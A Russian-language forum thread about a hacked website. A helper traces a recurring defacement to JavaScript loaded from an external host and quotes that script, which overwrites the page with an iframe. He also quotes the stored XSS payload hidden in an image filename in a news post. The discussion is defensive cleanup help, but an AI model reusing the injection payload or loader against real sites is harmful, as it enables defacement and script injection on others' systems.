Взломали сайт

[ksirone]

Собственно говоря вот пациент _vag-samara.ru перекопал все уже, вредоносный код в index.php на сайте нашел, но откуда он там берется не пойму. Сайт перезаливал из чистого бэкапа, не помогает. Где искать проблему? Могу скинуть данные от фтп, если что.

[codename]

ksirone,при отключении Javascript заглушка не появляется ищи в той стороне, iframe подгружается

http://khier1.netau.net/Khier.js


document.title="Khier";
document.documentElement.innerHTML = ("<iframe frameBorder='0' width='100%' height='768' scrolling='no' margin='0' src='http://khier1.netau.net/'></iframe>");
document.body.style.backgroundColor = "black";

upd

в последнем посте на главной картинка подгружается

<img src="admin/im_news/&lt;script src=&quot;http://khier1.netau.net/Khier.js&quot;&gt;aw&lt;/script&gt;.jpg" width="133px" height="100px">

[Razor]

вы кому то насолили ?

[ksirone]

Просто народ резвится. Проблему решил codename, за что ему большое спасибо. Вредоносный код был в базе данных, если у кого будет проблема.